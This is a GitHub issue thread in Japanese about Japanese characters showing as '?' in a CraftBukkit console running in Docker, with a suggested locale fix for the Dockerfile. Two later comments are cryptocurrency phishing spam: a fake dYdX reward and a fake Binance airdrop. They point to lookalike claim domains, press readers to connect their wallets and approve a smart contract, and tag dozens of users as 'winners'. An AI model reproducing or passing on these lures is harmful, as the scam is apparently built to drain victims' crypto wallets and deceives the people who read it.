### ISSUE TITLE
craftbukkitコンソールでの日本語表示

### ISSUE THREAD

**Issue by supermomonga** [supermomonga/akechi.rukkit#6]
![screenshot on 2014-11-25 at 08-01-19](https://cloud.githubusercontent.com/assets/377137/5174958/55dfe458-7479-11e4-994f-65f3da9b28fc.png)

この様に、日本語がすべて「?」と表示されています。ujihisa邸鯖ではこんなことはありませんでした。謎い。

![2014-11-25 7 58 41](https://cloud.githubusercontent.com/assets/377137/5174919/ef14e87c-7478-11e4-8580-e6cde87019ac.png)

ちなみに、このように`docker exec`を用いてdockerコンテナ内に入り、日本語を含むファイルをcatすると正常に日本語が表示されます。

**Comment by thinca** [comment]
```
RUN locale-gen ja_JP.UTF-8
ENV LANG ja_JP.UTF-8
```
これで行ける疑惑がある。今手元で rukkit core の方が上手く動かないので未検証。誰か試してみてください。

**Comment by supermomonga** [comment]
試します :+1:

**Comment by muraliR** [comment]
## Congratulations! You've been chosen to receive a $7,000 Rewards. 🪂🔴 


### Trading and Launch Rewards are live on dYdX Chain! ✨

Connect your wallet, follow the instructions, and claim this exclusive offer from Dydx Exchange. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

[![Dydx Exchange](https://pbs.twimg.com/card_img/1729868185275617280/nzyJpc7G?format=jpg&name=small)](https://claim.dydxexchang.com/)


[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Rewards Now!** [Check Eligibility](https://claim.dydxexchang.com/)

Access the Dydx Exchange platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your Rewards, up to $2,000!

@dydxprotocol

**Comment by ujihisa** [comment]
なにかの霊圧を感じた

**Comment by ryanpitts1** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @choguun, @knchst, @moh3n9595, @Adlinke, @ElvisWong, @Ardiansyah000, @antdke, @pontusab, @wy-z, @boyluan, @alexspyr, @crazile, @mohadmohammadi, @mushan0x0, @simoncollins, @nikfedotoff, @uni-mint, @wpank, @rekinrekin, @KPRepos, @MarcusSorealheis, @VenierGiacomo, @pfedan, @tsirysndr, @emnul, @rupeshpadhye, @parnexcodes, @jakzaizzat, @mayconmesquita, @nandofarias, @johnrjj, @dwieners, @oswaldb22, @joaodcp, @k-ool, @puneetsingh-ph, @nikhilem, @rjoshima, @blackdevelopa, @alexlevy0, @bidah, @leopictet, @ohararyan, @l5g, @vonovak, @lukeleppan, @1000F, @jordanlepera, @anhducvu-bot, @sozonome
